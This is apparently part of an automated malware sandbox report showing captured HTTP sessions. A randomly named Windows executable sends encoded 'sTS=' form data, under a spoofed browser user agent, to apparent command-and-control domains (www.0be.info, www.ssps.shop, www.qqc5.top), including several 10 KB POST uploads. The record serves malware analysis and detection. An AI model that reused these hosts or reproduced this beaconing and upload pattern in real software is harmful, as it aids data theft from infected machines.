                                                                                                                                      Data Ascii: sTS=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7c4cWBeK8xgjzTFVqOL4JmbeXHOgXbc6ujKPp4+AhdwsRWmX5fohSSnyEAcSFi6vdkVBSuf5xPmLUiQriYEeRcFesGY2itpkwHXMSIG/mYD+ynP6OjHqvp2JVTeZ95z8S+DkmqUGpqC3ovDE14P0wcqbAO5bl+bt1w0pCvZ94wbAuVVWuI/GRhkgnO6oHN81PiPpKEyL0lyfJCxZ+NCM0MOWSCNBTGpdWStkLWoQQZMwrBCbaQN/ozKOAzDN14JtktEcG4E3buogmjIWho8ubxfEYr35sCPQaW53GKJnih3w4tp3eEV6SyK07LZpaLC9o/jt8KPQZV5zT+WmU1w6XnjOdchsOq/mCTIugL4GQ32ayYQHe12L5S1CuadmM0B27vDbBAkn2veUWxb4fnjw8s2706T2Y1hn12p4MbCK7b/vaytnUBx+NHqQ+CrJzfO6CZv0wcCvcgAxS9gkLLatWoxJwax7AY5DJGbY3rJko+HQWsDhu2guDI08gPRkpVm3/d4+8njbUtIkFtDFstm91hwbOClCyKCelIAxTRQV8WTIXUT8sAXc2mvmO9A1UpZML3DuivEtN2tqeUCu0VsHMP0PsoQCvV0bdpdruYjy9smojkBV5wTgMI/6milBMdRLJjLpxa1VV9V+FIh8CrvoPJJ4XowpyAJWCW/+1IaPfm/e9q4U5Ae1uVBjbR1Rb5ctoR1tYqqtVQNuOCP2NKpebcFwG1QD1KUAcDcfDfVGUorb8AJfZrgqY2ulkuIq+GhrLr+3HTPZr/QJ4HaC/cPmAPUV3q6EvDl/LXgu9ZnmAB8bXTAggTyp4zzPhIEh8PScpCUfad+qqahbUs90oHioadG47ZxVnwpgSJOZLCMeQphAZkhaRtfQ9R+Xpd8kSrNLxeWWWUfZfCI6j85ferUAxhN+ZNklt8NFwLrG+pJ2mYMgG6d8mm9UMWEa5ms0yFfYP1koh2z [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:37:17.087085962 CET262INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 23V,VH(,JM0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.449937173.0.157.187804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:19.077018976 CET435OUTGET /5m3m/?sTS=sewIB7u3B3NHgPpecNRVGRfHaR4xptSr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekzKmes/Xrk63tnUiEwK+oMVFTyGd1xnpI1E=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:37:19.664984941 CET217INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: fLink is expired0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.45002113.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:40.974416971 CET693OUTPOST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 31 34 69 46 37 46 33 35 31 56 49 32 76 35 77 41 42 2b 78 48 73 53 38 43 71 73 52 53 54 4f 52 46 47 76 53 51 63 43 49 34 6c 33 66 70 4e 43 72 4a 63 55 76 75 41 78 73 34 55 73 4b 6a 55 34 4e 53 4e 35 34 4a 4a 30 77 51 65 38 30 74 75 4e 4a 44 6b 46 4e 6e 33 70 63 4d 49 78 6d 71 71 54 36 52 31 43 55 33 30 43 6d 4d 77 45 4b 4e 6e 38 42 58 4e 56 75 51 75 4e 42 62 79 33 56 4b 4a 4a 35 4b 55 76 4c 45 79 65 37 77 39 6c 64 2f 4c 69 2f 62 70 34 36 43 50 50 38 44 43 57 64 34 4e 2b 2b 44 48 37 48 47 51 4b 7a 45 51 76 77 42 38 67 69 70 64 4f 58 63 53 77 3d 3d
                                                                                                                                      Data Ascii: sTS=puifggN9xZ4A14iF7F351VI2v5wAB+xHsS8CqsRSTORFGvSQcCI4l3fpNCrJcUvuAxs4UsKjU4NSN54JJ0wQe80tuNJDkFNn3pcMIxmqqT6R1CU30CmMwEKNn8BXNVuQuNBby3VKJJ5KUvLEye7w9ld/Li/bp46CPP8DCWd4N++DH7HGQKzEQvwB8gipdOXcSw==
                                                                                                                                      Jan 11, 2025 09:37:41.426584959 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.45002213.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:43.533693075 CET713OUTPOST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 70 46 42 4f 69 51 64 48 30 34 6b 33 66 70 56 53 72 49 59 55 75 73 41 78 77 76 55 75 65 6a 55 37 78 53 4e 39 6f 4a 4a 48 49 54 63 73 30 76 37 64 4a 42 35 56 4e 6e 33 70 63 4d 49 79 61 51 71 54 79 52 30 79 6b 33 31 6a 6d 4c 75 30 4b 4d 33 73 42 58 63 46 75 55 75 4e 42 74 79 7a 4e 77 4a 4d 39 4b 55 72 50 45 79 4c 50 33 7a 56 63 30 46 43 2f 51 76 71 66 79 42 76 6c 66 64 67 46 65 45 75 71 45 4c 64 4b 63 42 37 53 54 43 76 55 79 68 6e 72 64 51 4e 71 56 4a 7a 59 69 65 36 73 33 45 47 75 51 62 63 57 54 56 6c 42 76 49 54 4d 3d
                                                                                                                                      Data Ascii: sTS=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4pFBOiQdH04k3fpVSrIYUusAxwvUuejU7xSN9oJJHITcs0v7dJB5VNn3pcMIyaQqTyR0yk31jmLu0KM3sBXcFuUuNBtyzNwJM9KUrPEyLP3zVc0FC/QvqfyBvlfdgFeEuqELdKcB7STCvUyhnrdQNqVJzYie6s3EGuQbcWTVlBvITM=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.45002313.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:46.086414099 CET10795OUTPOST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 68 46 42 34 57 51 63 6b 63 34 2b 33 66 70 5a 79 72 46 59 55 75 74 41 78 6f 6a 55 75 43 5a 55 39 39 53 4d 66 67 4a 50 79 6b 54 57 73 30 76 35 64 4a 63 6b 46 4e 79 33 70 73 49 49 78 79 51 71 54 79 52 30 30 6f 33 38 53 6d 4c 73 30 4b 4e 6e 38 42 54 4e 56 75 73 75 4a 73 59 79 7a 59 4e 4a 59 4a 4b 55 4c 66 45 7a 39 6a 33 78 31 63 32 43 43 2b 51 76 71 6a 74 42 76 35 54 64 67 5a 6b 45 73 32 45 49 36 50 66 56 2b 79 34 62 64 56 71 32 41 4c 45 59 50 43 54 4d 79 77 6b 59 4b 59 31 61 6c 75 37 5a 38 37 6a 49 32 70 5a 57 54 71 50 47 4b 58 30 6f 4b 42 79 45 56 6c 4a 41 66 36 47 2f 44 6a 4f 6f 50 6b 72 71 38 73 50 71 56 51 41 45 70 33 7a 48 56 47 30 6c 53 50 63 4a 54 6d 6d 79 68 45 54 6a 6e 76 44 48 73 4c 66 65 39 54 34 48 31 6e 46 34 4d 34 2f 2f 52 30 31 52 56 75 49 43 2b 35 76 79 47 53 42 58 33 6f 78 4b 32 6f 44 7a 68 70 2b 67 6c 36 66 6f 64 47 72 41 32 35 71 7a 2b 64 64 49 4e [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4hFB4WQckc4+3fpZyrFYUutAxojUuCZU99SMfgJPykTWs0v5dJckFNy3psIIxyQqTyR00o38SmLs0KNn8BTNVusuJsYyzYNJYJKULfEz9j3x1c2CC+QvqjtBv5TdgZkEs2EI6PfV+y4bdVq2ALEYPCTMywkYKY1alu7Z87jI2pZWTqPGKX0oKByEVlJAf6G/DjOoPkrq8sPqVQAEp3zHVG0lSPcJTmmyhETjnvDHsLfe9T4H1nF4M4//R01RVuIC+5vyGSBX3oxK2oDzhp+gl6fodGrA25qz+ddINJsCCA76m6B1YpPE8NCier67YA2XULG+MeKI6fhLayKraqPDlC2bnvxAAQs8NiLBzZBl4v8bgyT2HGGAQm/mOtQQllNgfDv3UsWpMH/Kl8HQMmG8CHXJh3V4PSJimlGTjXh8NxQ+yeQveiAfLbcmd0Imoe//ff+m0xyo6TqxUIMJF12ssNzX6dCiUp5a2nkMkIk2BCEs3YAPa+MAsUWKsAgTpyCL5naokjMwcnIA2JyBh/dsAlbvQ/8r5aX/KH1G0Vvqfdp85I51ppzrrkwEeP/CvZJIueM85J2PPf88hlFUOrCLcTBlEQK0vh8h8bgue+4+dD54ZxcCnUedJm7LRJsta3X9e1VQb6+dpgMAnxvp3onw1TcnfFs+uYPKpwZ0FSbGxP5K08bVukEwQIg8OKMQ3wo9BmJOoSXJ2x35e/N+00gSoSyIFeTmVM9lamA9WlmdPaq1eroJtDCFk2mhT0Znyd8fSh+PbPL01XOG4ZNGNj2+X72v93fy7xJWlci+ROIjfU5ZmzGNFfkobiOrJlXUfWrVh+ZI0msGgUszxBuW83SkXvoZMq0UXJDaf9qd7FsLbV8zGg/7yDhQJOgjlgZBWU5hw5GpFjY2PbBw2rAJsSQmMIqbu4paP3iy0FUY/IOGEQTReE9WgIkgUeZ17suPMxYTvlmovhK [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:37:46.582156897 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.45002413.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:48.632308960 CET436OUTGET /r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:37:49.081126928 CET377INHTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:37:49 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 54 53 3d 6b 73 4b 2f 6a 55 4d 51 77 6f 45 33 77 34 71 44 7a 6d 2f 71 76 30 31 62 67 35 35 50 46 2f 52 6d 6f 6a 74 68 73 66 68 6e 57 4e 4e 62 43 65 69 4c 53 55 67 59 33 68 50 38 57 52 36 6c 51 6b 32 54 48 30 4d 6d 62 73 2b 65 57 39 5a 4e 4b 34 4d 79 4e 6d 34 69 64 73 63 6c 2f 5a 74 6d 68 67 5a 49 32 2b 30 62 61 68 57 6f 71 54 33 41 6a 41 59 36 77 68 32 48 78 6d 6f 3d 26 66 64 3d 43 72 5f 54 41 68 54 70 76 5a 61 4c 66 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf"}</script></head></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.45002538.47.233.4804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:54.481193066 CET690OUTPOST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 73 31 4a 69 69 38 6b 72 4b 37 4d 61 62 39 72 2b 61 55 54 6f 2b 79 63 64 7a 53 33 75 44 6d 46 30 79 49 78 6c 6d 6d 63 35 54 5a 56 4a 4d 44 69 63 47 6b 78 32 32 6a 33 54 55 4d 49 2b 50 69 4e 43 7a 75 6a 68 44 30 63 33 6b 63 55 71 31 37 59 74 7a 73 67 37 58 30 76 4e 52 53 75 50 2b 61 73 48 68 75 55 37 71 39 78 57 75 39 63 6b 6d 36 49 63 4e 31 36 6f 2b 36 4d 42 76 58 59 69 56 59 45 64 6e 75 79 67 51 51 37 70 51 30 64 59 42 67 4c 50 68 63 2b 73 54 58 61 6a 75 45 48 6a 6a 6e 4d 33 6a 6a 45 42 32 6b 38 6c 68 64 39 7a 69 76 37 48 46 38 76 58 4d 77 3d 3d
                                                                                                                                      Data Ascii: sTS=V20nVuuNf5SAs1Jii8krK7Mab9r+aUTo+ycdzS3uDmF0yIxlmmc5TZVJMDicGkx22j3TUMI+PiNCzujhD0c3kcUq17Ytzsg7X0vNRSuP+asHhuU7q9xWu9ckm6IcN16o+6MBvXYiVYEdnuygQQ7pQ0dYBgLPhc+sTXajuEHjjnM3jjEB2k8lhd9ziv7HF8vXMw==


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.45002638.47.233.4804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:57.026593924 CET710OUTPOST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 32 55 35 69 75 37 77 72 4e 62 4d 5a 59 39 72 2b 54 30 53 76 2b 31 55 64 7a 54 6a 2b 44 77 74 30 78 71 35 6c 67 58 63 35 53 5a 56 4a 44 6a 69 64 49 45 78 4c 32 6a 37 74 55 4d 30 2b 50 69 4a 43 7a 72 66 68 43 48 45 30 6c 4d 55 73 34 62 59 76 75 38 67 37 58 30 76 4e 52 53 36 70 2b 61 30 48 68 2b 45 37 72 63 78 56 74 39 63 6e 68 36 49 63 62 31 36 6b 2b 36 4d 6a 76 57 30 45 56 61 4d 64 6e 74 6d 67 51 69 54 71 4c 6b 64 61 63 51 4b 44 78 4a 44 32 4c 69 6e 75 70 43 48 36 67 6e 45 6c 72 46 4a 62 6e 56 64 79 7a 64 5a 41 2f 6f 79 7a 49 2f 53 65 58 39 2f 32 65 33 78 67 33 79 51 2f 68 56 45 30 37 61 59 70 37 53 34 3d
                                                                                                                                      Data Ascii: sTS=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+Dwt0xq5lgXc5SZVJDjidIExL2j7tUM0+PiJCzrfhCHE0lMUs4bYvu8g7X0vNRS6p+a0Hh+E7rcxVt9cnh6Icb16k+6MjvW0EVaMdntmgQiTqLkdacQKDxJD2LinupCH6gnElrFJbnVdyzdZA/oyzI/SeX9/2e3xg3yQ/hVE07aYp7S4=
                                                                                                                                      Jan 11, 2025 09:37:57.897891998 CET691INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.45002738.47.233.4804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:37:59.837841988 CET10792OUTPOST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 56 32 30 6e 56 75 75 4e 66 35 53 41 32 55 35 69 75 37 77 72 4e 62 4d 5a 59 39 72 2b 54 30 53 76 2b 31 55 64 7a 54 6a 2b 44 77 56 30 79 66 74 6c 6a 30 45 35 44 70 56 4a 64 7a 69 51 49 45 78 61 32 6a 7a 70 55 4d 34 45 50 67 42 43 38 70 6e 68 46 32 45 30 76 4d 55 73 78 37 59 73 7a 73 67 75 58 30 2f 7a 52 52 43 70 2b 61 30 48 68 34 41 37 73 4e 78 56 68 64 63 6b 6d 36 4a 64 4e 31 37 7a 2b 38 6c 63 76 57 41 79 57 71 73 64 6d 4c 47 67 44 6d 7a 71 48 6b 64 63 66 51 4c 65 78 4a 47 6f 4c 69 54 49 70 43 62 41 67 6c 59 6c 6f 6a 63 6e 79 33 4a 6b 71 65 39 35 39 71 6d 75 54 63 47 47 63 2b 6a 6a 52 6b 78 6d 6f 52 55 42 6e 46 56 65 69 61 6f 70 67 53 2f 75 49 79 6f 70 4a 45 34 6a 42 6d 49 65 39 72 47 4b 77 57 31 39 63 4b 48 76 79 4e 64 50 4f 6c 77 6c 76 52 57 64 70 38 67 50 33 70 49 74 58 4f 55 4d 77 33 47 37 31 59 50 37 7a 4e 64 43 74 57 65 58 37 31 38 51 34 48 72 68 62 56 47 79 6d 58 77 4d 64 48 45 39 69 68 71 51 44 67 31 79 33 4a 46 36 32 51 44 4a 34 65 70 36 57 43 71 52 4b 36 53 72 69 50 31 4e 45 31 [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+DwV0yftlj0E5DpVJdziQIExa2jzpUM4EPgBC8pnhF2E0vMUsx7YszsguX0/zRRCp+a0Hh4A7sNxVhdckm6JdN17z+8lcvWAyWqsdmLGgDmzqHkdcfQLexJGoLiTIpCbAglYlojcny3Jkqe959qmuTcGGc+jjRkxmoRUBnFVeiaopgS/uIyopJE4jBmIe9rGKwW19cKHvyNdPOlwlvRWdp8gP3pItXOUMw3G71YP7zNdCtWeX718Q4HrhbVGymXwMdHE9ihqQDg1y3JF62QDJ4ep6WCqRK6SriP1NE1wCrvfMH/WHlcwaLUMBadMwkuS+cOTboPeAeVBEKv37Bq23WkFnJSvL/xDgQclljGc1P1FMwRuBx71XAVpOiv6+yRoHbDtFFPfZwznhmg6m9vTHu//C9TTmQJoacGFkwoxNM2fWyzOK5BlxUbZvrtyQDUHJCtx8s8dV3Cv62QtWh6lFExVl1XXpI1iP8SlqNn8hf6RzbcqoloorTr9DDLUf44GJw8NcOcDr5aszgMCdUSO6+1/WDY8GxRQxkygW0w1OUeedWHbp7/J8HYfawk8uctXAC3vWPfyk6HHV6pZr1y8YgVy7yJytp5sWRugQs2RmA0zQuxMNITcdmbGO7n7/OdrBMYlQrGU0LTtLhKMI5epORL5MkIj0ITpkAFylyBYpU5CjyRZ9EoLM7Xh7oVypWO/c58OCkyyxX9rJsrjr18mJT6DMHi2qiOg/9AXuk7WikiE1/v1tIDjSVyeya+Yf54BHofwF66mha56jZlC/0YLxC+nkLhnWL+KxESDu4mF0GZ0D2bUhKxpEvhc4/0Hqyz2Ywu8qGngDn0KGkpb+lTstkC2fydksPRUAnjSoKstBVpohWm0tRhA2RdQFibYr+zrYbeyiqTI2wD/PJR3wQqYfxpR9TX3hoBEl7cTvMTdUPHMSSRYIrHN2HkGKR6wyH6Cs2eqWybW5 [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:38:00.591064930 CET691INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:00 GMT
                                                                                                                                      Content-Type: text/html
